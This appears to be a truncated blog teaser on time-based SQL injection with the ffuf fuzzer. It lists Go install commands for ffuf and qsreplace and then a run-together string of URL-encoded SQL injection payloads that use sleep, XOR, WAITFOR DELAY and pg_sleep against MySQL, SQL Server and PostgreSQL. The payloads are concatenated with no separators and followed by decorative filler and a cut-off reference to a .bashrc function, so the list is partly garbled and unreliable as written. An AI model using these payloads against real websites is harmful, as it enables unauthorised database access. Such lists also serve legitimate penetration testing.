Time-Based SQL Injection with ffuf

Tools First we need latest version of go-lang install ffuf | go get -u github.com/ffuf/ffufqsreplace | go get -u github.com/tomnomnom/qsreplace PAYLOADS XOR(if(now()=sysdate(),sleep(5),0))OR%27if(now()=sysdate(),sleep(5),0)(select(0)from(select(sleep(5)))v)/%27+(select(3)from(select(sleep(5)))v)+%27%22+(select(0)from(select(sleep(5)))v)+%22/%27XOR(if(now()=sysdate(),sleep(51),0))XOR%27Z 1%20AND%20(SELECT%20%20FROM%20(SELECT(SLEEP(5)))YYYY)%20AND%20%27%%27=%271%27XOR(if(now()=sysdate(),sleep(5),0))OR%271%20AND%20(SELECT%201337%20FROM%20(SELECT(SLEEP(5)))YYYY)-13371%20or%20sleep(5)%23%27%20WAITFOR%20DELAY%20%270:0:5%27--%%27;SELECT%20PG_SLEEP(5)--pg_sleep(5)%27|%20|pg_sleep(5)-- ıllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıll lıllııllıllııllıllııllıllıılıllııllıllııllıllııllıllıılıllııllıllııllıllııllıllııll Add-in .bashrc function # Time Based Sql…

Continue ReadingTime-Based SQL Injection with ffuf